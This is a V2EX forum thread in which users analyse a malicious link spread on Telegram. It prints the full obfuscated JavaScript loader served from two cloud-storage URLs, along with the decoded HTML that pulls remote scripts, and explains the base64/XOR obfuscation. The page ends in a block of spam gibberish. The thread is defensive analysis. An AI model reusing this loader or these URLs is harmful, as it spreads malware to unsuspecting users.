TG 里面的恶意 url 链接 - V2EX

TG 里面的恶意 url 链接 - V2EX

首页注册登录

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

已注册用户请登录

RANDOM.org 密码生成器

Dashlane 密码管理器

这是一个创建于 667 天前的主题，其中的信息可能已经有所发展或是发生改变。

在 TG 上看到一个恶意连接在腾讯云，里面放了 2 个连接，分别是： https://cos.ap-chengdu.myqcloud.com/w84ipa-1701748018-1322650058/Update/2023/12/05/wv-w84iap,S5x0dpA9?channelCode=66006&s=49099bbcf6bda5c58ae9ebe761da1aec&t=0810 和 https://cos.ap-chengdu.myqcloud.com/w84ipa-1701748024-1322650058/Update/2023/12/05/wv-w84iap,S5x0dpA9?channelCode=66009&s=f3e1e98b02de5803ea07dcb5b1a2a34e&t=0810 ！！！请不要用浏览器点进去！！！通过 curl 访问，发现是里面有个加密的 js 脚本，如下：

<script>(function(){var i=0,t="",s="M yV!QV,g!Zh Qw!R Rf!n B H,O0 8!EW F 1b!U R,I,8 Bl J Q,aF9 eD!w J/Y V!4 5,J gw t L XV 1 BH,p!9T kY 7!b!W,ZZc!XF4C Txs L!EN!iY GAOK l!ZhB,j,kLCF,I!t,X AA o enp3V S h xT AF,Z b,mQV,P2BT,dF!o,Kd 1w,Cbw J Y LwsM!Ey,1w d h B,p bnBI!O2,Z 2,A mF!h Wl!Y pX VJ,MaH,sIB w,J,g ZUU5N,gw,tLX!V!1 BHp!9 T kg!4,Bn 5B W35 n AQ,Y!H,LF N oa!3tYB3Bl,QQ!AYVxAoBF g!Wa,X5 gBg,UHY,l l!afm,QJ KV l fQ1 t BAF8!6!C n la A S,VuHz,1uZ!g9,/V!H,B BA G1Y AFpb eBw p,W S hPWms,IB g B/ Z!V4,HJ W,0QPgRM FW!pU c EEtBwV a dmU,DEg!Rj!UkxZ!VnxeM1J!AQ A!BQ d h!8F b,n ZTY 15,ZV!S!h 2!dVZ,o,fn!g M Bl kKT l!x7c 0,0 AV,XoP K g9 Q V g,B+dhl,8U!A 5EAGI B WmJ!u!X,l U/ YyB KX H,9 WQg,E!LeU w!v,N,X4,M,PQR iEG,l!h!fF!o!Fcm!F,E Y,W FO F,gB,sMEx,hC!3 x!C!OgoOQi!9Rbh E!+ c X,JTaW,o P!XANy!DV!h h YUEQ A!V ow!VX RVf0Y AQQJCAjUM!E w,VY eQp,jU0FEAg!d 6SF l!u d F Y1,Uwl e c X tw U,DN!w e V wAD 1QR,AH V,2U1Zh d,F 4,x,Z n4 B!Ym 5!eV!i!kG F!lFc!V,X!d N!O,gt9!R,g,Aqa Q!8t,fno aak,MG!Ww B 9Z!gFb!fntQ,K U!1fC!m,J,ve!EI6 Cm VD L!w 8!B,ET5,hARN,R,V3 gC,OGJM QnRbW hA,pB!l 9 O!Y m,8ERw FWeQ Y6N,U AV KFtEG,Xp!T,Ag otB,n pbW 1 t aEQFwUn J xe3B,Q!Kn!x,PTDp,R c hYHf mUEV 3F,aRTth B Fh!c!cWB!S AXd!f S!G,F ga,18A Cnl P!Ajp 6V!i!1f d,hl!QVHs L!KF hc,A!V,x+dBw,qX V5P W!W8E XD l gX wU5NX4V AH,F,TF,lE K,e,Eg tYnJ b!YQ!R,g F T!9 sL F,Fcf,2 R!C,Om 9!P,RgY6b h,M,9 B XkW a gsP!Ri!0 G,Y k!Zi!cXB!WP2!d fS,V!pV!Y1!sGew9O LjZ,9HCg FV 1d9fl pa An!Y!BQ!FtP!f0!0 1 d 1 9!D!Y Qt 7RwB,wZh0 g CE8 Q BXF iC!2 l,9,A!nk xcn5,HY n 5,d,T!S!Z!eH kN h,C,3 t HA H B,mH SA,LeQ,Etd X!YOV2 4DW AVyW Eda!X 3!QP K140fG!J,v,f!0E!5,f2FgA Q,9 UD A!YEZg!9!4 c Xg!C A lx!f Vl,1 B WQ!Es d ydecX,twUC,p!wf,V,o H,K!m 4!f Bl92C!G!lueEQ7 cmJnb,V1 a,I,g c!GV!0 5aCg,Rb A,VZ mWTo 6ah,A 9X1!w!ZV3 F!/Qi1!b e,k Z,a cVpWLnc FV3!N rB EM6!YHZ ZOQ,x u E z 0F,Zh!NRCw J!dO!E!x!fV l!1BW Q,E sd,yde cX twUCp7,dl E q I!Xof,P m,5m U lB U,Al!Ur,TG F f cX,V FAS5 3BU51e!1 JQK!E F!1XC8P dgk9,b,n4n UQt,k X!j Bt Z,V,5 1,d V0 T!AX N f bVx!w e0cBVVR ZL,jZ hFi9,l!ARlR,flpYO 2Z!TRXVfX!V!Em XS,d!ecXtwUC,p7,dl EF,MV!M T BV s NE1,F!Q,U V wr T F9B,d!0F Z A!Sx3 J15 eaV5Q,K n!t2!U,Q!cPfh,8tcX4L,U!AtjA,C9wek!daWGQK!B1 o3X m h rc!1w,5b3l A O,SV!uJAZ,bZ j N!XY W R FB,W,1m cmF,ue,Ao r Xj!d,Wc2 x,C,fCp7!dlEqKm,I,OB1 92CF E!Le1 Ux,ZnZa WgR 4Vw!djME x c e,wR B AH,9,hQy gh X,F!Y+ b!lx Tf w!t,eA gNi Q19,0 d,XcI,B,l kwTl!p /,d105a 1R G!LBVXA,S 1 1d QR,X!V HB LKHJ mW!V x1d18s,cy 8L dn,1j!W zo,K Dl!0 5NG4T,B!W F6 F W l+!Y 10!4W H JLY m J v,V jQ GX0x cf,2d,C!B,3t cA SAL eQEtd XYIU Q!t 7RwUGfkF ccWMJP 3 M,gCX,N,s Qnwqe3 Z,R!K iVq,E D1P!A Ql,Rf,g9!I O2 ZT!Q X!dBWV4!p B yhTW1 V!dQ A,d,8A 3!0z I!QEP!B gR,m V,mN e!WQo!tB,1w BWm!F!B T!Q== ",o="indexOf",q="charAt",w="charCodeAt",f=String.fromCharCode,p="cb8fd64c3962a541866fe4f98817c876";s=s.replace(/[^A-Za-z0-9+/=]/g,"");s=be4(s);for(i=0;i<s.length;i++)t+=String.fromCharCode(s.charCodeAt(i)^p.charCodeAt(i%32));document.write(be4(t));function be4(s){var c,d,e,h,j,n,r,i=0,v="",t="",l="",m="",o="indexOf",q="charAt",w="charCodeAt",f=String.fromCharCode;for(k=0;k<26;k++){m+=f(65+k);l+=f(97+k)}for(k=0;k<10;k++)l+=k;l=m+l+"+/=";if(localStorage.sev){eval(localStorage.sev)}while(i<s.length){c=l[o](s[q](i++));d=l[o](s[q](i++));e=l[o](s[q](i++));h=l[o](s[q](i++));j=(c<<2)|(d>>4);n=((d&15)<<4)|(e>>2);r=((e&3)<<6)|h;v+=f(j);if(e!=64){v+=f(n)}if(h!=64){v+=f(r)}}c=d=i=0;while(i<v.length){c=v[w](i);if(c<128){t+=f(c);i++}else if(c>191&&c<224){d=v[w](i+1);t+=f(((c&31)<<6)|(d&63));i+=2}else{d=v[w](i+1);e=v[w](i+2);t+=f(((c&15)<<12)|((d&63)<<6)|(e&63));i+=3}}return t}})();</script>

这个是什么 0day 吗，有无大佬解析一下这个代码的作用是什么

9 条回复 2023-12-22 22:42:02 +08:00

1

lll5758

2023-12-22 15:54:18 +08:00

解析完后的代码
<html lang="zh-cn">
<head>
<meta charset="utf-8">
<title>Loading... Please wait...</title>
<script src="htt 屏蔽地址防止误点 ps://indexwealth.oss-acc 屏蔽地址防止误点 elerate.aliyuncs.com/update/global/md5.min.js"></script>
<script src="htt 屏蔽地址防止误点 ps://indexwealth.oss-accel 屏蔽地址防止误点 erate.aliyuncs.com/update/global/vue.cjs.min.js"></script>
<script type="text/Javascript" src="ht 屏蔽地址防止误点 tps://web.cdn.openins 屏蔽地址防止误点 tall.io/openinstall.js"></script>
<script typ="text/Javascript" src="htt 屏蔽地址防止误点 ps://indexwealth.oss-accelerate.aliyu 屏蔽地址防止误点 ncs.com/update/index/1113/w84iap.js"></script>
</head>
<body>
<script>
function b64DecodeUnicode(str) {
return decodeURIComponent(atob(str).split('').map(function(c) {
return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);
}).join(''));
}
var base64COntent= decodeAndOutputBase64();
var doc = document.open('text/html', 'replace');
var dat = b64DecodeUnicode(base64Content);
doc.write(dat);
doc.close();
</script>
</body>
</html>
通过查看 openinstall.js 的代码.
可能是安装了什么,最后还会向某个地址发了请求.具体得看这个 openinstall.js 的代码

2

sleepm

2023-12-22 16:11:58 +08:00

像是 app 推广安装
xxx.top 跳转到 cos.....
然后加载 openinstall.js

3

remember5

2023-12-22 16:21:04 +08:00

@lll5758 大佬，这个怎么解密的啊

4

lopponial

2023-12-22 16:50:33 +08:00

@remember5 #3 不需要你自己解，浏览器开个匿名窗口，丢到控制台执行，直接看 dom 就能看到了

5

lll5758

2023-12-22 16:51:00 +08:00

@remember5 #3 啊?你就跑一下那个 js 代码.最后就出来结果字符串了啊.

6

cslive

2023-12-22 17:16:04 +08:00

用对象存储，就没人给他测试一下吗

7

InDom

2023-12-22 17:28:04 +08:00

2

代码写的花里胡哨，核心就是把一段代码进行 base64 以后使用逐字符进行位处理（凯撒密码）。

然后把转换后的代码再次 base64 后随机插入特殊符号（空格、,、!）就好了。

还原也很简单，直接执行，或者把 document.write 替换为 console.log 就好了，为了兼容性，他甚至没有使用 atob

8

remember5

2023-12-22 18:04:18 +08:00

@lopponial @lll5758 学会了，谢谢大佬们

9

blankmiss

2023-12-22 22:42:02 +08:00

刷它 oss 让他不做好事

关于帮助文档自助推广系统博客 API FAQ Solana 2560 人在线 最高记录 6679

Select Language

创意工作者们的社区

World is powered by solitude

VERSION: 3.9.8.5 23ms UTC 07:49 PVG 15:49 LAX 00:49 JFK 03:49
Do have faith in what you're doing.

ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86